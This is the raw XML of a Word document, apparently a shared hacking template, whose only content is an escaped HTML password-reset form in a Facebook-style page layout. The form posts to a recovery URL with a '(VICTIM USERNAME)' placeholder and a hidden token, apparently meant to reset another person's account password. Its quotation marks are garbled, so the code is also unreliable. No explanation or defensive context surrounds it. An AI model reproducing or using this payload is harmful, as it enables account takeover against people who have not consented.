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370E" w:rsidRDefault="003A416A">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="003A416A">
        <w:t>&lt;form method=”post” action=”/recover/password?u=(VICTIM USERNAME)&amp;n=389548? onsubmit=”return window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)” id=”u_0_4?&gt;&lt;input type=”hidden” name=”lsd” value=”AVoH0gpvlk4? autocomplete=”off”&gt;&lt;div class=”mvl ptm uiInterstitial uiInterstitialLarge uiBoxWhite”&gt;&lt;div class=”uiHeader uiHeaderBottomBorder mhl mts uiHeaderPage interstitialHeader”&gt;&lt;div class=”clearfix uiHeaderTop”&gt;&lt;div class=”rfloat _ohf”&gt;&lt;h2 class=”accessible_elem”&gt;Choose a new password&lt;/h2&gt;&lt;div class=”uiHeaderActions”&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;h2 class=”uiHeaderTitle” aria-hidden=”true”&gt;Choose a new password&lt;/h2&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=”phl ptm uiInterstitialContent”&gt;&lt;div class=”mvm uiP fsm”&gt;A strong password is a combination of letters and punctuation marks. It must be at least 6 characters long.&lt;/div&gt;&lt;table class=”uiInfoTable” role=”presentation”&gt;&lt;tbody&gt;&lt;tr class=”dataRow”&gt;&lt;th class=”label”&gt;&lt;label for=”password_new”&gt;New Password&lt;/label&gt;&lt;/th&gt;&lt;td class=”data”&gt;&lt;input type=”password” class=”passwordinput” id=”password_new” name=”password_new” tabindex=”1? autocomplete=”off”&gt;&lt;label class=”mls uiButton” for=”u_0_0?&gt;&lt;input value=”?” onclick=”show_pwd_help(); return false;” tabindex=”3? type=”button” id=”u_0_0?&gt;&lt;/label&gt;&lt;div id=”password_new_status”&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class=”dataRow”&gt;&lt;th class=”label”&gt;&lt;label for=”password_confirm”&gt;Confirm Password&lt;/label&gt;&lt;/th&gt;&lt;td class=”data”&gt;&lt;input type=”password” class=”passwordinput” id=”password_confirm” name=”password_confirm” tabindex=”2? autocomplete=”off”&gt;&lt;div id=”password_confirm_status”&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div class=”mvl”&gt;&lt;div class=”mvm”&gt;To make sure your account’s secure, we can log you out of any other computers and phones. You can log back in with your new password.&lt;/div&gt;&lt;div class=”mvm”&gt;&lt;div class=”uiInputLabel clearfix uiInputLabelLegacy”&gt;&lt;input type=”radio” checked=”1? name=”reason” value=”kill_sessions” onclick=”CSS.hide(ge(“chpw_survey_hacked_warn&amp;quotWink)” class=”uiInputLabelInput uiInputLabelRadio” id=”u_0_1?&gt;&lt;label for=”u_0_1? class=”uiInputLabelLabel”&gt;Log me out of other devices&lt;/label&gt;&lt;/div&gt;&lt;div class=”uiInputLabel clearfix uiInputLabelLegacy”&gt;&lt;input type=”radio” name=”reason” value=”keep_sessions” onclick=”CSS.show(ge(“chpw_survey_hacked_warn&amp;quotWink)” class=”uiInputLabelInput uiInputLabelRadio” id=”u_0_2?&gt;&lt;label for=”u_0_2? class=”uiInputLabelLabel”&gt;Keep me logged in&lt;/label&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=”mtm hidden_elem” id=”chpw_survey_hacked_warn” style=”color:red;”&gt;If your account was hacked, please select “Log me out of other devices”&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=”uiInterstitialBar uiBoxGray topborder”&gt;&lt;div class=”clearfix”&gt;&lt;div class=”rfloat _ohf”&gt;&lt;label class=”uiButton uiButtonConfirm” id=”btn_continue” for=”u_0_3?&gt;&lt;input value=”Continue” name=”btn_continue” type=”submit” id=”u_0_3?&gt;&lt;/label&gt;&lt;a class=”uiButton” href=”/” role=”button” name=”reset_action”&gt;&lt;span class=”uiButtonText”&gt;Cancel&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=”pts”&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0071370E" w:rsidSect="00DC77DA">
      <w:pgSz w:w="11907" w:h="16840" w:code="9"/>
      <w:pgMar w:top="2268" w:right="1418" w:bottom="1531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16A"/>
    <w:rsid w:val="000C7635"/>
    <w:rsid w:val="0027182B"/>
    <w:rsid w:val="003A416A"/>
    <w:rsid w:val="0054090A"/>
    <w:rsid w:val="0071480B"/>
    <w:rsid w:val="00754EC4"/>
    <w:rsid w:val="008F10B0"/>
    <w:rsid w:val="009724D9"/>
    <w:rsid w:val="00AB3260"/>
    <w:rsid w:val="00CD23F5"/>
    <w:rsid w:val="00CE7B8C"/>
    <w:rsid w:val="00DC77DA"/>
    <w:rsid w:val="00F7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04AE50-C100-4899-9F99-FD74A5DA1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445</Words>
  <Characters>2538</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>21</Lines>
  <Paragraphs>5</Paragraphs>
  <ScaleCrop>false</ScaleCrop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Tristianto Nugroho</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Tristianto Nugroho</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-06-12T16:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-06-12T16:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>